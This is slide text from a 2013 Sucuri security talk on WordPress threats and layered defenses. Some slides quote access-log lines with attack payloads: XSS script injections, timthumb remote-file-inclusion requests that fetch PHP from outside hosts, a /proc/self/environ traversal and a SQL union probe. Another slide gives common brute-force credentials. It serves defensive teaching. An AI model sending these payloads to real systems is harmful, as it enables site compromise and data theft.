  • 3.  Website Security Company  GlobalOperations  AllWebsite Platforms  Scan 1M Unique Domains a Month  Block 1M web attacks a Month  300 – 500 websites a day  Signature / Heuristic Based  24/5 - 18/2 operations 5/1/2013 Tony Perez | @perezbox | @sucuri_security 3
  • 4.  Trends  Threats  Defenses 5/1/2013 Tony Perez | @perezbox | @sucuri_security 4 SIMPLE RIGHT?
  • 5. Tony Perez | @perezbox | @sucuri_security5/1/2013 5
  • 6. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 6 Malicious Links 2011 2012
  • 7. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 7
  • 8. Known Malware Unkown Malware 5/1/2013 Tony Perez | @perezbox | @sucuri_security 8
  • 9. Not Infected Infected 5/1/2013 Tony Perez | @perezbox | @sucuri_security 9
  • 11. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 11 Apache SSH Email Server  Going Deeper than the application layer, targeting the server.  Server Polymorphism – a.k.a changes a lot
  • 12.  StickWith Reputable Sources  Gravity Forms  JetPack Forms  Generating SPAM emails, resource hogs  IP blacklisting  LeverageCaptchas 5/1/2013 Tony Perez | @perezbox | @sucuri_security 12
  • 13. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 13
  • 14.  Pharmacy  Payday Loans 5/1/2013 Tony Perez | @perezbox | @sucuri_security 14
  • 15. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 15  Access – so easy, yet so weak
  • 16. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 16
  • 17. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 17
  • 18. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 18 Site 1 Site 2Site 3 Site 4WordPress 2.8 WordPress 3.5.1 WordPress 3.4.2 WordPress 3.0
  • 19. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 19
  • 20. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 20
  • 21. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 21
  • 22. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 22
  • 23. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 23
  • 24. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 24
  • 25.  W3TC &WP Super Cache  Remote Command Execution (RCE)Vulnerability  WPMM  SPAM Injections (Bad Plugin)  Social MediaWidget  SPAM Injections (Core Commit) 5/1/2013 Tony Perez | @perezbox | @sucuri_security 25
  • 26.  Explosion in the Malware as a Service (MaaS) trade  Yes, pay someone to hack for you  Different tools to break in and generate payloads  Brute force and vulnerability exploits Malware Payloads  Blackhole Exploit Kit – Today’s market leader  2013 – SophoLabs 5/1/2013 Tony Perez | @perezbox | @sucuri_security 26
  • 27. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 27
  • 28. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 28
  • 29. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 29
  • 30. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 30  Use for malware?  Burrow into network?  Steal data? What kind of website do you have?
  • 31. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 31 38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268  Stored  Reflective
  • 32. [02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0” 83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&amp;sa=U&amp;ei=vGBcUYS1IcOaiQLxu4HIBg&amp;ved=0CCYQFjAE&amp;usg=AFQjCNFN1APEnX9- WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6” 82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 5/1/2013 Tony Perez | @perezbox | @sucuri_security 32
  • 33. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 33 62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”
  • 34. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 34
  • 35. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 35
  • 36.  Brand Reputation  Legal Implications  Impact to Sales  Blacklisted by Search Engines  Blacklisted by Payment processors  Worst Day Of your Life 5/1/2013 Tony Perez | @perezbox | @sucuri_security 36
  • 37. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 37
  • 38.  Access Control  Vulnerabilities  Hosting  Online Habits  Social Media  Passwords 5/1/2013 Tony Perez | @perezbox | @sucuri_security 38
  • 39. “It’s about risk reduction… risk will never be zero…” 5/1/2013 Tony Perez | @perezbox | @sucuri_security 39
  • 40.  We run on WordPress  CurrentVersion of course  Sucuri properties suffer:  ~125,000 web based attacks a month on average  ~4,000 attacks a day ▪ This spikes on occasion  Doesn’t include server level attacks  All flavors of attacks 5/1/2013 Tony Perez | @perezbox | @sucuri_security 40
  • 41.  Instead of telling you what you need to do, I’ll just tell you what we do;  Our philosophy and approach is very simple, complex things break in complex ways;  We focus on the areas that we can immediately control;  We believe in layered defenses; 5/1/2013 Tony Perez | @perezbox | @sucuri_security 41
  • 42. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 42 Stay Current IPWhitelisting Two Factor Authentication Strong / Unique Password Web Application Firewall
  • 43. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 43 IPWhitelisting Server Isolation Public Key Authentication Host Intrusion Detection System (HIDS) Log Everything
  • 44. Category Tool Type Prevention – SoftwareVulnerabilities Sucuri CloudProxy Service Prevention – Access Control Sucuri CloudProxy Service Detection Sucuri Monitoring Service Remediation Sucuri Service Password Management 1Password / LastPass Application Host-based Intrusion Detection System OSSEC Application Access Control Enforcement Login Secure Solutions Plugin Two-Factor Authentication Google Authenticator Plugin Application Auditing Sucuri Premium Plugin Backups BackupBuddy Plugin 5/1/2013 Tony Perez | @perezbox | @sucuri_security 44
  • 45. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 45 Category Location Type DisableTheme / Plugin Editor wp-config.php Preventive measure Disable PHP execution .htacces – uploads / images / wp-includes / etc.. Preventive measure Permissions Directories 755 / Files 644 Preventive measure
  • 46. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 46 • Don’t know what you’re doing? • Go with a managed host…
  • 47. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 47 Doesn’t mean you won’t ever get infected.
  • 48. Complex . Long . Unique . Esoteric “CLUE” 5/1/2013 Tony Perez | @perezbox | @sucuri_security 48 652,911 [log] => admin 10173 [log] => test 8992 [log] => administrator 8921 [log] => Admin 2495 [log] => root 16,798 [pwd] => admin 10,880 [pwd] => 123456 9,727 [pwd] => 666666 9,106 [pwd] => 111111 7,882 [pwd] => 12345678 7,717 [pwd] => qwerty 7,295 [pwd] => 1234567 USERNAMES PASSWORDS Epic Fail
  • 49.  Access  Login Secure Solution  Stealth Login  Limit Login  Scanning  WordFence  Anti-Malwatch  Defense in Depth  BetterWP Security  BulletProof Security  Vulnerabilities  MVIS Security Center 5/1/2013 Tony Perez | @perezbox | @sucuri_security 49
  • 50. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 50 Name Tool Sucuri Blog http://blog.sucuri.net SucuriTV http://sucuri.tv WordPress Forum – Hacked http://wordpress.org/tags/hacked WordPress Forum – Malware http://wordpress.org/tags/malware Badware Busters https://badwarebusters.org Perishable Press http://perishablepress.com/category/web-design/security/ Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked- sites WordPress.org Hardening http://codex.wordpress.org/Hardening_WordPress GoogleWebmasterTools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633 Secunia SecurityAdvisories http://secunia.com/community/advisories/search/?search=wordpress Exploit-DB http://www.exploit- db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
  • 51. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 51